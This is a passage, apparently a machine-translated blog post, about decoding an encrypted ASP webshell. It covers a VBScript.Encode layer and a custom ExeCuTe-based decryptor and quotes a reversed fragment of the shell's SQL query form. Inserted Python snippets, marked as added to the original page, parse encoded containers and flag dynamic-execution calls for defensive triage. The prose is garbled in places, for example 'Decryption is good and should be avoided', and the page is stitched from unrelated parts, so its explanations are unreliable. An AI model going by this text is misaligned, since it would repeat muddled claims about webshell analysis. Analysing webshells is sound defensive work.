The webshell is encrypted randomly. Decryption is good and should be avoided. On the Rise, decryption came out, and found that the shell is not simple, and many people are obligated to work.
Encryption source code
<%@ LANGUAGE = VBScript.Encode %>
The code is too long to copy in full here.
First, the file is encoded with VBScript.Encode, the weak encoding produced by screnc.exe, which has good compatibility. There are many decoding tools for it on the Internet, and you can use a VBScript.Encode decoder to decode the file. However, pay attention to the handling of special characters.
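The VBScript.Encode layer can be recognised and sanity-checked without decoding or running it. The following is an added example, not code from the original page: it relies on the publicly documented Script Encoder container layout and escape pairs (an assumption the page does not spell out), and `triage`, `unescape` and `make_sample` are hypothetical names.

```python
import base64
import re
import struct

# Publicly documented Script Encoder container (not taken from the page):
#   #@~^ <8 base64 chars: length> <body> <8 base64 chars: checksum> ^#~@
HEADER = re.compile(r"#@~\^([A-Za-z0-9+/]{6}==)")
TRAILER = "^#~@"
LANG_DIRECTIVE = re.compile(r"\b(?:VBScript|JScript)\.Encode\b", re.I)

# Escape pairs the encoder emits for characters it cannot write directly.
ESCAPES = {"@&": "\n", "@#": "\r", "@*": ">", "@!": "<", "@$": "@"}


def unescape(body: str) -> str:
    """Expand the two-character escapes; the substitution cipher is not undone here."""
    return re.sub(r"@[&#*!$]", lambda m: ESCAPES[m.group(0)], body)


def triage(text: str) -> dict:
    """Locate encoded blocks and read their headers without decoding or running them."""
    blocks = []
    for m in HEADER.finditer(text):
        # The length field is a little-endian 32-bit integer in base64.
        declared = struct.unpack("<I", base64.b64decode(m.group(1)))[0]
        end = text.find(TRAILER, m.end())
        available = (len(text) if end == -1 else end) - m.end()
        blocks.append({
            "offset": m.start(),
            "declared_length": declared,
            # Missing trailer or too little data means the copy is incomplete.
            "truncated": end == -1 or available < declared,
        })
    return {"declares_encode": bool(LANG_DIRECTIVE.search(text)), "blocks": blocks}


def make_sample(body: str) -> str:
    """Constructed test input: a placeholder body wrapped in a valid container."""
    length = base64.b64encode(struct.pack("<I", len(body))).decode()
    return f"<%@ LANGUAGE = VBScript.Encode %>\n<%#@~^{length}{body}AAAAAA==^#~@%>"


if __name__ == "__main__":
    sample = make_sample("xx@#@&yy@!b@*")
    print(triage(sample))
    print(triage(sample[:55]))  # cut short, as when a paste is incomplete
    print(repr(unescape("a@#@&b@!c@*d@$")))
```

A decoder that mishandles the `@`-escapes yields a body with missing angle brackets and line breaks, which is the special-character problem mentioned above.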
After the VBScript.Encode layer is decoded, the result still looks like a bunch of garbled characters, but many function names are now visible. This shows that a custom encryption function is used: the code is decrypted by that function and then run through ExeCuTe.
Generally, encrypted pages include static encryption pages and dynamic encryption pages. For dynamic encryption pages, you generally need to set up IIS for decryption. Here, the first encryption code is used. The colon (:), in both its Chinese and English forms, in the encrypted VBS is the code connector, which is equivalent to a carriage return. The first encryption code can be extracted as follows:
UZSS = NewStr: End Function: ShiSan = "> srr ∞ on = llorcs SRR neht = noitcA fI ∞ ydob <srr ∞> tpircs/<SRR ∞}; eurt nruter ;) (timbus. mroFbD; = LMTHrenni. CBA; gp = eulav. egaP. mroFbD; rts = eulav. rtSlqS. mroFbD}; eslaf nruter ;)! Are you sure you want to check the LQS? (trela {) 01
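Because the colon joins statements, the decoded layer can be split back into one statement per line and checked for ExeCuTe calls without running it. The following is an added example, not code from the original page: the sample script, the names `Dec` and `Blob`, and both function names are constructed for illustration.

```python
import re

# Dynamic-execution keywords of VBScript, matched case-insensitively.
DYNAMIC_EXEC = re.compile(r"\b(?:ExecuteGlobal|Execute|Eval)\b", re.I)
STRING_LITERAL = re.compile(r'"(?:[^"]|"")*"')

# Constructed sample: a decoder function, a data string and an ExeCuTe call on one line.
SAMPLE = ('Function Dec(s):Dec = StrReverse(s):End Function:'
          'Blob = "x:y ""Execute"" z":ExeCuTe Dec(Blob)')


def split_statements(source: str) -> list[str]:
    """Split on ':' and line breaks, ignoring colons in strings and ' comments."""
    statements, current = [], []
    in_string = in_comment = False
    for ch in source + "\n":              # trailing newline flushes the last statement
        if ch in "\r\n":
            in_string = in_comment = False  # neither strings nor comments span lines
        elif in_comment:
            continue
        elif ch == '"':
            in_string = not in_string      # "" toggles twice, so the state stays correct
        elif ch == "'":
            if not in_string:
                in_comment = True
                continue
        if not in_string and ch in ":\r\n":
            stmt = "".join(current).strip()
            if stmt:
                statements.append(stmt)
            current = []
        else:
            current.append(ch)
    return statements


def flag_dynamic_execution(source: str) -> list[str]:
    """Return statements that call Execute/ExecuteGlobal/Eval outside string literals."""
    return [s for s in split_statements(source)
            if DYNAMIC_EXEC.search(STRING_LITERAL.sub('""', s))]


if __name__ == "__main__":
    for line in split_statements(SAMPLE):
        print(line)
    print("flagged:", flag_dynamic_execution(SAMPLE))
```

`Rem` comments and `#...#` date literals are not handled; a flagged statement marks the point where the next layer would be decrypted and run.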